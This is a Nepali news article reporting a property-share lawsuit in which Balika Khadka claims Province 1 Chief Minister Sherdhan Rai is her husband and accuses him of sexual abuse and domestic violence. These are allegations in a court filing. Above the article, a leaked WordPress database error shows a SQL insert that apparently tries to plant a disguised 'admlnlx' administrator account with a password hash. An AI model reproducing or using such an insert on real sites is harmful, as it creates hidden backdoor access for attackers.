WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BmTcqTdiVtEyJ1p2UryccSlANnUDui1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 14:32:50', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाडौँ । प्रदेश नम्बर १ का मुख्यमन्त्री शेरधन राई आफ्नो पति भएको दाबी गर्दै दोलखाकी बालिका खड्काले अंश मुद्दा दायर गरेकी छिन् । खड्काले ‘नाता कायम गरी अंश दिलाई पाँउ’ भनी जिल्ला अदालत काठमाडाैंमा अंश मुद्दा दायर गरेकी हुन् ।
बालिका खड्काले सञ्चारमन्त्री भएका बखत राईले राजधानीको गोल्फुटारमा आफूलाई कोठा लिएर राखेको र आफू राईसँग २०७१ सालदेखि सँगै रहेको उल्लेख गरेकी छन् ।
राईले आफूलाई यौन दुव्यवहार गर्दै घरेलु हिंसा गरेको आरोप समेत मुद्दामा लगाएकी छन्। मुख्यमन्त्री राईले शारीरिक यातना दिएकोसमेत उनको मुद्दामा उल्लेख छ।
राईविरूद्ध मुद्दा दर्ता भएको काठमाडौं जिल्ला अदालतले जानकारी दिएको छ।